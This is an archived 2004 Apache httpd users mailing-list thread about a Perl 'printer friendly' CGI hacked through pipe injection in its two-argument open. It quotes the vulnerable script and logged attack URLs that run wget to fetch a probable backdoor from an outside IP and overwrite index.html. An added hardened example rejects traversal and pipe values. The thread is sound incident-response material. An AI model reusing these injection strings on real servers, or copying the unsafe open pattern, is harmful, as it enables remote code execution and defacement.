From Murthy Ambaru <bobby...@yahoo.com>
Subject Re: [users@httpd] Security Problem
Date Sun, 05 Dec 2004 21:08:21 GMT
Thanks for the explanation. So the file can be downloaded to the /tmp/bind directory on the server
by executing that script. As I said, I tried typing in the URL used and got nothing. I did not
check /tmp/bind though (I did not find that in the interface that I use to manage files
on the server). So what would be a secure way of opening the file?
The script is in Perl. I am adding it below. Can you see anything weird in it? Thanks...
 
#!/usr/local/bin/perl
print "Content-type: text/html\n\n";
&parseForm;
open(HEADER,"printheader.html") ;
my @HEADER = <HEADER>;
close(HEADER);
#print it! Put a # before print if you don't want a header printed...
print "@HEADER";
my $data_file = "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
# Two-argument open: when $data_file ends in "|", Perl runs it as a shell command
# and reads its output, which is how the "|wget ...|" value in the log got executed.
if (!open(FILE,"$data_file")) { die "Can't open";}
my @FILE = <FILE>;
close(FILE);
$print = 1 ;
foreach $line(@FILE) {
        if ($line =~ /beginimage/) {
                print $line ;
                $print = 0;
                next ;
        }
        if ($line =~ /endimage/) { $print = 1 ; }
        if ($print eq "1") {
                print $line;
        }
}

########################################################
sub parseForm {
    if ($ENV{'REQUEST_METHOD'} eq 'GET') {
        # Split the name-value pairs
        @pairs = split(/&/, $ENV{'QUERY_STRING'});
    }
    elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
        read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
        # Split the name-value pairs
        @pairs = split(/&/, $buffer);
    }
    foreach $pair (@pairs) {
        ($name, $value) = split(/=/, $pair);
        # Un-Webify plus signs and %-encoding
        $value =~ tr/+/ /;
        $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
        $FORM{$name} = $value;
    }
}

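On the question of a secure way to open the file: the following is an added example, not the script from the thread and not Apache project code, showing the two changes a reviewer would make to xyz.cgi, an allowlist check on the `file` value followed by a three-argument open. It assumes the same scriptfiles directory layout; the temporary directory and the two rejected values are constructed for the demonstration.

```perl
#!/usr/bin/perl
# Added example, not the script posted in the thread: a hardened way to open
# the page named by ?file= . Mirrors xyz.cgi's scriptfiles layout (assumed).
use strict;
use warnings;
use Cwd qw(realpath);
use File::Temp qw(tempdir);

# Canonical path of $file under $base, or undef if the value is unacceptable.
sub safe_path {
    my ($base, $file) = @_;
    # 1. Allowlist: segments of [A-Za-z0-9_-] ending in .htm or .html. '|', ';',
    #    '<', '>', spaces, NUL and '..' can never match, so no shell metacharacter
    #    reaches open() and no segment can climb out of $base.
    return undef unless defined $file
        && $file =~ m{\A/?(?:[A-Za-z0-9_-]+/)*[A-Za-z0-9_-]+\.html?\z};
    $file =~ s{\A/}{};
    # 2. Resolve symlinks and confirm a regular file really exists there.
    my $real      = realpath("$base/$file");
    my $real_base = realpath($base);
    return undef unless defined $real && defined $real_base && -f $real;
    # 3. The resolved file must still sit below the resolved base directory.
    return index($real, "$real_base/") == 0 ? $real : undef;
}

# Three-argument open with an explicit read mode: the name is only ever a file
# name, so a '|' in it cannot turn the call into a command pipe the way the
# two-argument open("$data_file") in the thread's script does.
sub read_page {
    my ($path) = @_;
    open(my $fh, '<', $path) or return undef;
    my @lines = <$fh>;
    close($fh);
    return \@lines;
}

# Demonstration on a constructed scriptfiles directory holding one real page.
my $base = tempdir(CLEANUP => 1);
mkdir "$base/2004" or die "mkdir: $!";
open(my $w, '>', "$base/2004/0722-08.htm") or die "create: $!";
print $w "<p>printer friendly page</p>\n";
close($w);
for my $value ('/2004/0722-08.htm',          # the legitimate value from the thread
               '/2004/0722-08.htm|echo x',   # constructed: a pipe appended
               '../../etc/passwd') {         # constructed: traversal attempt
    my $path  = safe_path($base, $value);
    my $lines = defined $path ? read_page($path) : undef;
    printf "%-28s => %s\n", $value, $lines ? scalar(@$lines) . " line(s) read" : 'rejected';
}
```

In the CGI itself the call becomes `my $path = safe_path($BASE, $FORM{file}) or die "Can't open";` with `$BASE` set to the scriptfiles directory. Running the script with Perl's `-T` taint mode on top of this makes the interpreter refuse any remaining unchecked use of request data.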

"Ivan Barrera A." <Bruce@Ivn.cl> wrote:
I mean, the CGI script (which I don't know anything about) seems to "open"
a file referred to by ?file= ... Probably an insecure way of "opening"
the file leads to executing the rest of the statement.

Look :

?file=/2004/0722-08.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind

After the correct page, a pipe, and wget http://blabla/bind -O/tmpbind
is appended. So, if the script executes this, the command wget will
exec, and download that file into /tmp/bind.
After that, using the same technique, you can exec anything you want. So
the problem is the way of opening (or doing something else to) the files
in the CGI script.
Is it a C, Perl, PHP, or any other language script?

Murthy Ambaru wrote:
> Thanks for the response Ivan. I am sorry I really did not understand what
> you mean by "download the file to /tmp/bind". When the printer friendly
> link is clicked, this is the URL that will be accessed:
> http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-08.htm
> Of course it depends on the page being clicked at. So the file name will
> be passed as a parameter to the CGI file. I included the CGI code in my
> earlier mail, could you please take a look.
> Thanks,
> Murthy
> 
> "Ivan Barrera A." <Bruce@Ivn.cl> wrote:
> 
> the URL you entered downloads the file bind to /tmp/bind. It's
> probably an IRC bot or a backdoor.
> If someone did that, the version of the CGI script is insecure, and
> should be revised.
> 
> I'm sorry if I didn't clarify enough, but it would be useful to see that CGI.
> 
> Murthy Ambaru wrote:
> > I have a question regarding security. There is a web site that has a
> > printer friendly version of web pages being displayed using a CGI
> > script. Apparently when this was in use, the site was hacked and some
> > unwanted stuff posted on the site. I had a look at the access.log when
> > this occurred and this was what showed up (I just replaced the site name
> > with xyz, everything else is the same):
> >
> > /images/newswireprint.gif HTTP/1.0" 304 -
> >
> > "http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-08.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind| " "Mozilla/4.0
> >
> > GET /cgi-bin/xyz.cgi?file=|echo%20innocent%20boys...%20%3E%20/data/httpd/vhosts/xyz.org/httpdocs/index.html|
> >
> > Can anyone understand how they are able to hack? I tried reproducing it
> > by typing in the above URL used by hackers, but could get nothing out of
> > it. The permissions on all the html docs folders are set to 755.
> >
> > Below is the CGI file being used. It basically strips images off. Can
> > anyone help with this problem? What should I be looking at to plug
> > the security holes.... Thanks a lot
> >
> > -Murthy
> >
> >
> >
> > #!/usr/local/bin/perl
> >
> > print "Content-type: text/html\n\n";
> >
> > &parseForm;
> >
> > open(HEADER,"printheader.html") ;
> > my @HEADER = <HEADER>;
> > close(HEADER);
> > #print it! Put a # before print if you don't want a header printed...
> > print "@HEADER";
> >
> > my $data_file =
> > "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
> >
> > if (!open(FILE,"$data_file")) { die "Can't open";}
> > my @FILE = <FILE>;
> > close(FILE);
> >
> > $print = 1 ;
> >
> > foreach $line(@FILE) {
> >
> > if ($line =~ /beginimage/) {
> > print $line ;
> > $print = 0;
> > next ;
> > }
> >
> > if ($line =~ /endimage/) { $print = 1 ; }
> >
> > if ($print eq "1") {
> > print $line;
> > }
> >
> > }
> >
> >
> > ########################################################
> >
> > sub parseForm {
> >
> > if ($ENV{'REQUEST_METHOD'} eq 'GET') {
> > # Split the name-value pairs
> > @pairs = split(/&/, $ENV{'QUERY_STRING'});
> > }
> > elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
> >
> >
> > read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
> >
> > # Split the name-value pairs
> > @pairs = split(/&/, $buffer);
> > }
> > foreach $pair (@pairs) {
> > ($name, $value) = split(/=/, $pair);
> >
> > # Un-Webify plus signs and %-encoding
> > $value =~ tr/+/ /;
> > $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
> >
> > $FORM{$name} = $value;
> > }
> >
> > }
> >
> >
> >
> >
> >

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org